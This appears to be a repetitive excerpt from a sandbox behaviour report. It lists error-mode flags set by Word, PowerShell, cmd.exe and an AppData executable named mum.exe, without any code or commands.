Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
